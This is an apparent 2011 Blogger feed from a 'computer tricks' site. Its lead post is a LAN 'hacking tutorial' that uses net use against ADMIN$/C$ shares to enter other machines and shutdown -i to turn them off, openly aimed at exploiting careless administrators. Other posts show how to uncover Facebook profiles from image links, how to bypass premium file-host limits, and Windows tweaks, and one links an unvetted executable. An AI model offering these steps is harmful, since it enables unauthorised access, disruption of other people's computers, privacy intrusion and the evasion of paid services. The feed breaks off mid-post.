<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-6977674572159411589</id><updated>2011-12-07T05:42:23.757-08:00</updated><category term='facebookhack'/><category term='g'/><category term='pc'/><category term='proxy'/><category term='net'/><category term='SQL'/><category term='WINDOWS 7'/><category term='windows xp genuine'/><category term='BLOCK'/><category term='ram'/><category term='Re-enable CMD'/><category term='folder'/><category term='fast'/><category term='hacking'/><category term='crack'/><category term='rapidshare'/><category term='bios'/><category term='Test'/><category term='CHECK'/><category term='SECRETS'/><category term='picture'/><category term='keygen'/><category term='start'/><category term='internet'/><category term='[TUT]Windows Local Area Network Hacking Tutorial[TUT]'/><category term='hide'/><category term='IP'/><category term='windows'/><category term='task manager'/><category term='pendrive'/><category term='Facebook new shortcuts'/><category term='d'/><category term='protection'/><category term='xp'/><category term='harddisk'/><category term='facebook'/><category term='hack'/><category term='SIDEBAR'/><category term='speed'/><category term='VIRUS'/><category term='fud'/><category term='java'/><category term='usb'/><category term='ETHICAl'/><category term='administrator'/><category term='How to get facebook profiles from facebook image links.'/><category term='cd'/><category term='Regedit and Task Manager from being block'/><category term='How To Boot Winxp Fast'/><category term='unlimited'/><category term='Increase Virtual RAM - To Make Your System Faster'/><category term='pdf'/><category term='dialup'/><category term='taskbar'/><category term='iCON'/><category term='hidden'/><category term='earn'/><category term='antivirus'/><category term='GMAIL'/><category term='Download from permium account free'/><category term='trick'/><category term='genuine make'/><category term='genuine'/><category term='WEBSITE'/><category term='ESET PASSWORD'/><category term='activate'/><category term='fun'/><category term='product key'/><category term='md5'/><category term='disable'/><category term='damage'/><category term='run'/><category term='account'/><category term='premium'/><category term='password'/><category term='google'/><category term='shut down'/><category term='money'/><title type='text'>computer tricks</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><link rel='next' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default?start-index=101&amp;max-results=100'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>102</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-9212911420589908254</id><published>2011-11-23T01:42:00.000-08:00</published><updated>2011-11-23T01:43:20.220-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='[TUT]Windows Local Area Network Hacking Tutorial[TUT]'/><title type='text'>[TUT]Windows Local Area Network Hacking Tutorial[TUT]</title><content type='html'>Hellow I suppose you could consider  this a hacking tutorial of sorts. There are tutorials written very  poorly, I must say, that classify these techniques as NetBIOS hacking.  It can be considered hacking when used for malicious purposes, and also  when you are testing computer security and integrity. But as far as  networking goes, you are using SMB (Server Message Block) , which is an  application layer networking protocol, to provide shared access to  files, printing services, serial ports, and other things between to  nodes on a network. A node is just an active device connected to a  computer network, like a computer or switch. In computer science, nodes  are generally used in graphs, whether they be directed or undirected.  The topology of a network acts in the same way, pretty much where two  devices on a network intersect, as two lines would in a graph. But,  security administrators should also turn SMB off unless they absolutely  need it, in which case they should be implementing a network firewall.  So, we are going to take advantage of their stupidity. The only  difference between using the techniques in this tutorial and exploiting a  remote network service with a stack overflow (also called a stack-based  buffer overrun) is, well, they aren't as sexy as the latter. But, due  to human stupidity, we can access remote machines through file sharing  an we can also shut them down. &lt;br /&gt;&lt;br /&gt;Well, first of all you can get into remote computers on the same Local  Area Network because of a service no network should ever used unless  they absolutely NEED to. It's called file sharing. To get into a remote  computer, you have to use shares.&lt;br /&gt;&lt;br /&gt;First, you need a target. Just to test this out, you are going to type in&lt;br /&gt;&lt;div class="codeblock"&gt; &lt;div class="title"&gt;Code:&lt;br /&gt;&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code&gt;net view&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;Then, you will see a list of host names. You could resolve them to IP Addresses to get into them using the &lt;div class="codeblock"&gt; &lt;div class="title"&gt;Code:&lt;br /&gt;&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code&gt;ping&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;  command, but I just use the host name. Now you need to know the share  you want to use with the remote host. Generally these shares are named &lt;div class="codeblock"&gt; &lt;div class="title"&gt;Code:&lt;br /&gt;&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code&gt;IPC$&lt;br /&gt;ADMIN$&lt;br /&gt;C$&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;Etc. Now, when you looked at those shares, which one made your weeble  wobble? That's right, it's the ADMIN$ share. However, it would not be a  bad idea to take a look at the other two shares. To display your local  share names, type this command into your command prompt-&lt;br /&gt;&lt;div class="codeblock"&gt; &lt;div class="title"&gt;Code:&lt;br /&gt;&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code&gt;net share&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;Now let's say you found that ADMIN$ shares were being used locally  across the network. Now what you are going to do is connect to the  target host. Type this in-&lt;br /&gt;&lt;br /&gt;&lt;div class="codeblock"&gt; &lt;div class="title"&gt;Code:&lt;br /&gt;&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code&gt;net use * \\hostname\ADMIN$&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;Let me explain this-&lt;br /&gt;&lt;br /&gt;&lt;div class="codeblock"&gt; &lt;div class="title"&gt;Code:&lt;br /&gt;&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code&gt;net use&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;This is the command used to specify you want to use a shared resource on another computer.&lt;br /&gt;&lt;br /&gt;&lt;div class="codeblock"&gt; &lt;div class="title"&gt;Code:&lt;br /&gt;&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code&gt;*&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;The asterisk is the most important part. This character will help you  navigate through the remote host's files, because it will create a  drive. You could specify the drive if you wanted to, but for a tutorial  like this we will use the asterisk, and it will generate a drive name.  If you use more than one host, then the drive to use for the first host  would be named Z:, the second Y:, etc.&lt;br /&gt;&lt;br /&gt;&lt;div class="codeblock"&gt; &lt;div class="title"&gt;Code:&lt;br /&gt;&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code&gt;\\hostname&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;This is the hostname specified in the net use command, which will be  seen when you execute the net view command. The forward slashes are part  of the syntax, but they will also be included in the output from the  net view command.&lt;br /&gt;&lt;br /&gt;&lt;div class="codeblock"&gt; &lt;div class="title"&gt;Code:&lt;br /&gt;&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code&gt;\ADMIN$&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;This is the share name that you are using with the hostname. The dollar  sign is part of the syntax of the share name, and the forward slash is  part of the syntax of the net use command.&lt;br /&gt;&lt;br /&gt;Here is an example of the command in action-&lt;br /&gt;&lt;br /&gt;&lt;div class="codeblock"&gt; &lt;div class="title"&gt;Code:&lt;br /&gt;&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code&gt;net use * \\ABCLI123-65\ADMIN$&lt;/code&gt;&lt;/div&gt;&lt;/div&gt; Or&lt;br /&gt;&lt;div class="codeblock"&gt; &lt;div class="title"&gt;Code:&lt;br /&gt;&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code&gt;net use * \\192.168.1.100\C$&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;If this command works, then the message “The command completed  successfully”, then you have connected to the remote host. Now, just  click the Start button, navigate to “Computer”, or “My Computer”, and  look for the drive name that was specified in the output from the  command prompt after you executed the command. Click it, and of course  you will have access to the files on the remote host.&lt;br /&gt;&lt;br /&gt;AREN'T YOU A LUCKY DUCK!&lt;br /&gt;&lt;br /&gt;Now, if this doesn't work, mostly because of system error 53 or system  error 5, then deny the remote host service.  No, we're not going to bust  out the ping of death, but we will shut their machines down. Now then,  if I was going to do this, which I have, I would use the interface to  simplify things. Go to a command prompt and type in&lt;br /&gt;&lt;br /&gt;&lt;div class="codeblock"&gt; &lt;div class="title"&gt;Code:&lt;br /&gt;&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code&gt;shutdown -i&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;If you get another error, well, I'm not going to do a full tutorial for  hacking Windows machines, but if you get no error, then here is what you  do. Remember the &lt;div class="codeblock"&gt; &lt;div class="title"&gt;Code:&lt;br /&gt;&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code&gt;net view&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;  command? Well, perform that command again, and look at all the machines  on your network. When you see the list of machines, notice the [ \\ ]  characters at the beginning of each host name. When you look at the  interface for shutting down remote computers, there will be a button  that says Add, in the top right hand corner, next to the text box. Click  this button, and type in (or copy and paste) the host name into the  input box you will be prompted with, and click Ok. You should see the  host name in the text box. Now you can specify other options, such as  the reason you are shutting them down, how long you want to shut them  down for (in seconds), and a text box at the bottom to specify comments.  Type in a comment after you specify the delay before shutdown,  and  give your reason (I usually choose the “Other” option). Then click the  OK button at the bottom of your  GUI, and if you don't get an error in  the command prompt you invoked the GUI with, then the remote host has  been shutdown. :)&lt;br /&gt;&lt;br /&gt;AREN'T YOU A LUCKY DUCK!&lt;br /&gt;&lt;br /&gt;Anyway, I enjoyed writing this little tutorial for you guys, hope you learned something new. :D&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-9212911420589908254?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/9212911420589908254/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2011/11/tutwindows-local-area-network-hacking.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/9212911420589908254'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/9212911420589908254'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2011/11/tutwindows-local-area-network-hacking.html' title='[TUT]Windows Local Area Network Hacking Tutorial[TUT]'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-2786133891933182323</id><published>2011-11-23T01:41:00.001-08:00</published><updated>2011-11-23T01:41:21.464-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='How to get facebook profiles from facebook image links.'/><title type='text'>How to get facebook profiles from facebook image links.</title><content type='html'>Ok so you see a facebook image link which is like&lt;br /&gt;&lt;br /&gt;&lt;a href="http://a3.sphotos.ak.fbcdn.net/hphotos-ak-ash4/380187_230848613642627_100001524709980_618599_199138399_n.jpg" target="_blank"&gt;http://a3.sphotos.ak.fbcdn.net/hphotos-a...8399_n.jpg&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;and you think hmm i wonder what this guy's real name is.&lt;br /&gt;&lt;br /&gt;start off typing this in notepad&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.facebook.com/profile.php?id=" target="_blank"&gt;http://www.facebook.com/profile.php?id=&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;now normally on the third set of numbers the one that starts with a 1 and is near the beginning that is there profile id.&lt;br /&gt;&lt;br /&gt; so from these numbers&lt;br /&gt;&lt;br /&gt;380187_230848613642627_100001524709980_618599_199138399_&lt;br /&gt;&lt;br /&gt;I see the third set is 100001524709980&lt;br /&gt;&lt;br /&gt;so i do this&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.facebook.com/profile.php?id=100001524709980" target="_blank"&gt;http://www.facebook.com/profile.php?id=100001524709980&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;then that is his profile.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-2786133891933182323?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/2786133891933182323/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2011/11/how-to-get-facebook-profiles-from.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/2786133891933182323'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/2786133891933182323'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2011/11/how-to-get-facebook-profiles-from.html' title='How to get facebook profiles from facebook image links.'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-2833462217625783980</id><published>2011-11-23T01:38:00.000-08:00</published><updated>2011-11-23T01:39:27.829-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Download from permium account free'/><title type='text'>Download from permium account free</title><content type='html'>&lt;span style="color: rgb(255, 102, 0);font-size:100%;" &gt;Hi guys,&lt;br /&gt;&lt;br /&gt;here is a small guide how to download from HOTFILE, FILESONIC as a premium without any program.&lt;/span&gt; &lt;span style="color: rgb(255, 102, 0);font-size:100%;" &gt;&lt;br /&gt;&lt;br /&gt;just add this part in the first of the link  "http://s1.vidfetch.pl/file.php?link="&lt;/span&gt; &lt;span style="color: rgb(255, 102, 0);font-size:100%;" &gt;&lt;br /&gt;&lt;br /&gt;example : "http://s1.vidfetch.pl/file.php?link=http://www.filesonic.com/file/3220415864/SGLANOFULL.part01.rar"&lt;/span&gt; &lt;span style="color: rgb(255, 102, 0);font-size:100%;" &gt;&lt;br /&gt;&lt;br /&gt;- Let IDM manage your downloads and check the status of the link before using this method.&lt;/span&gt; &lt;span style="color: rgb(255, 102, 0);font-size:100%;" &gt;&lt;br /&gt;&lt;br /&gt;edit: its working 100% on hotfile and filesonic.. but iam not sure about another file hosting some links success and some not.&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-2833462217625783980?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/2833462217625783980/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2011/11/download-from-permium-account-free.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/2833462217625783980'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/2833462217625783980'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2011/11/download-from-permium-account-free.html' title='Download from permium account free'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-7922450532207094333</id><published>2011-11-23T01:37:00.001-08:00</published><updated>2011-11-23T01:37:37.660-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='How To Boot Winxp Fast'/><title type='text'>How To Boot Winxp Fast</title><content type='html'>&lt;span style="font-weight: bold;"&gt;&lt;div style="text-align: center;"&gt;&lt;span style="color: rgb(0, 191, 255);"&gt;&lt;span style="font-size: xx-large;"&gt;&lt;span style="font-family: Verdana;"&gt;How To Boot Winxp Fast&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size: x-large;"&gt;&lt;span style="color: rgb(0, 191, 255);"&gt;&lt;span style="font-weight: bold;"&gt;&lt;div style="text-align: center;"&gt;Follow the following steps:&lt;/div&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(51, 204, 255);"&gt;1. Open notepad.exe, type "del c:\windows\prefetch\ntosboot-*.* /q" (without the quotes) &amp;amp; save as "ntosboot.bat" in c:\&lt;br /&gt;&lt;br /&gt;2. From the Start menu, select "Run..." &amp;amp; type "gpedit.msc".&lt;br /&gt;&lt;br /&gt;3. Double click "Windows Settings" under "Computer Configuration" and double click again on "Shutdown" in the right window.&lt;br /&gt;&lt;br /&gt;4. In the new window, click "add", "Browse", locate your "ntosboot.bat" file &amp;amp; click "Open".&lt;br /&gt;&lt;br /&gt;5. Click "OK", "Apply" &amp;amp; "OK" once again to exit.&lt;br /&gt;&lt;br /&gt;6. From the Start menu, select "Run..." &amp;amp; type "devmgmt.msc".&lt;br /&gt;&lt;br /&gt;7. Double click on "IDE ATA/ATAPI controllers"&lt;br /&gt;&lt;br /&gt;8. Right click on "Primary IDE Channel" and select "Properties".&lt;br /&gt;&lt;br /&gt;9. Select the "Advanced Settings" tab then on the device or 1 that&lt;br /&gt;doesn't have 'device type' greyed out select 'none' instead of 'autodetect' &amp;amp; click "OK".&lt;br /&gt;&lt;br /&gt;10. Right click on "Secondary IDE channel", select "Properties" and repeat step 9.&lt;br /&gt;&lt;br /&gt;11. Reboot your computer.&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-7922450532207094333?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/7922450532207094333/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2011/11/how-to-boot-winxp-fast.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/7922450532207094333'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/7922450532207094333'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2011/11/how-to-boot-winxp-fast.html' title='How To Boot Winxp Fast'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-4751637143533437473</id><published>2011-11-23T01:36:00.001-08:00</published><updated>2011-11-23T01:36:40.492-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Increase Virtual RAM - To Make Your System Faster'/><title type='text'>Increase Virtual RAM - To Make Your System Faster</title><content type='html'>&lt;span style="font-size: medium;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="color: cyan;"&gt;&lt;span style="color: rgb(255, 215, 0);"&gt;&lt;span style="font-family: Verdana;"&gt;&lt;span style="font-size: xx-large;"&gt;Increase Virtual RAM - To Make Your System Faster&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Follow the steps given below :-&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 215, 0);"&gt;1)&lt;/span&gt; Hold down the 'Windows' Key and Press the 'Pause/Break' button at the top right of your keyboard.&lt;br /&gt;Another way is Right-Clicking 'My Computer' and then Select 'Properties'.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 215, 0);"&gt;2)&lt;/span&gt; Click on the 'Advanced' tab.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 215, 0);"&gt;3)&lt;/span&gt; Under 'Performance', click 'Settings'.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 215, 0);"&gt;4)&lt;/span&gt; Then click the 'Advanced' tab on the button that pops up.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 215, 0);"&gt;5)&lt;/span&gt; Under 'Virtual Memory' at the bottom, click 'Change'.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 215, 0);"&gt;6)&lt;/span&gt; Click the 'Custom Size' button.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 215, 0);"&gt;7)&lt;/span&gt; For the initial size  (depending on your HD space), type in anywhere from 1000-1500 (although I  use 4000), and for the Maximum size type in anywhere from 2000-2500  (although I use 6000).&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 215, 0);"&gt;8)&lt;/span&gt; Click 'Set', and then exit out of all of the windows.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 215, 0);"&gt;9)&lt;/span&gt; Finally, Restart your computer.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 215, 0);"&gt;10)&lt;/span&gt; You now have a faster computer and 1-2GB of Virtual RAM..!&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-4751637143533437473?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/4751637143533437473/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2011/11/increase-virtual-ram-to-make-your.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/4751637143533437473'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/4751637143533437473'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2011/11/increase-virtual-ram-to-make-your.html' title='Increase Virtual RAM - To Make Your System Faster'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-887642566893112637</id><published>2011-11-23T01:35:00.001-08:00</published><updated>2011-11-23T01:35:31.892-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Facebook new shortcuts'/><title type='text'>Facebook new shortcuts</title><content type='html'>&lt;span style="text-decoration: underline;"&gt;Note : This has been tested from the URL &lt;a href="http://www.facebook.com/" target="_blank"&gt;http://www.facebook.com&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;1. Alt + 0 ---&amp;gt; Facebook help (&lt;a href="http://www.facebook.com/help/?ref=pf%29" target="_blank"&gt;http://www.facebook.com/help/?ref=pf)&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;2. Alt + 6 ---&amp;gt; Facebook Settings (&lt;a href="http://www.facebook.com/settings?ref=mb%29" target="_blank"&gt;http://www.facebook.com/settings?ref=mb)&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;3. Alt + 7 ---&amp;gt; Facebook Privacy Settings (&lt;a href="http://www.facebook.com/settings/?tab=privacy&amp;amp;ref=mb%29" target="_blank"&gt;http://www.facebook.com/settings/?tab=privacy&amp;amp;ref=mb)&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;4. Alt + 8 ---&amp;gt; Facebook Official Page (&lt;a href="http://www.facebook.com/facebook%29" target="_blank"&gt;http://www.facebook.com/facebook)&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;5. Alt + 9 ---&amp;gt; Facebook Statement of Rights and Responsibilities (&lt;a href="http://www.facebook.com/terms.php?ref=pf%29" target="_blank"&gt;http://www.facebook.com/terms.php?ref=pf)&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;If you find more, please post it. I will add to the Original post.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;Thanks for reading.&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-887642566893112637?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/887642566893112637/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2011/11/facebook-new-shortcuts.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/887642566893112637'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/887642566893112637'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2011/11/facebook-new-shortcuts.html' title='Facebook new shortcuts'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-6217085285622746690</id><published>2011-11-23T01:31:00.000-08:00</published><updated>2011-11-23T01:32:21.932-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Regedit and Task Manager from being block'/><category scheme='http://www.blogger.com/atom/ns#' term='Re-enable CMD'/><title type='text'>Re-enable CMD, Regedit and Task Manager from being block</title><content type='html'>&lt;div class="post_body" id="pid_17585666"&gt;      &lt;span style="color: rgb(128, 0, 0);"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-style: italic;"&gt;&lt;span style="font-weight: bold;"&gt;Hi  guys, well there would be many new people to hacking and accidently  click on their tools and disable all those stuff i wrote on the title or  being hacked by a hacker and they don't know how to solve it. They  don't know what to do except reinstall their window or restore.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="font-style: italic;"&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 205);"&gt;&lt;span style="font-size: large;"&gt;Today, i'll show you these easy steps to recover your authority as an administrator on your PC &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(50, 205, 50);"&gt;&lt;span style="text-decoration: underline;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="font-style: italic;"&gt;&lt;span style="font-size: x-large;"&gt;Enable Regedit!&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="font-style: italic;"&gt;&lt;span style="text-decoration: underline;"&gt;&lt;span style="font-size: medium;"&gt;1st Method&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;Click Start -&amp;gt; Run… and enter this command (all on one line) :&lt;br /&gt;&lt;br /&gt;REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f&lt;br /&gt;&lt;br /&gt;If that didn't work for you? try the second method&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;span style="text-decoration: underline;"&gt;&lt;span style="font-style: italic;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="font-size: medium;"&gt;2nd Method&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;download this and launch it, it'll enable your regedit!!!&lt;br /&gt;&lt;a href="http://www.mediafire.com/?877c2vaamu1l3a5" target="_blank"&gt;http://www.mediafire.com/?877c2vaamu1l3a5&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Note: if both method don't work then your computer is being infected with a malware that change your registry over time&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(50, 205, 50);"&gt;&lt;span style="text-decoration: underline;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="font-style: italic;"&gt;&lt;span style="font-size: x-large;"&gt;Enable CMD!&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;OK guys, enable CMD and task manager would be 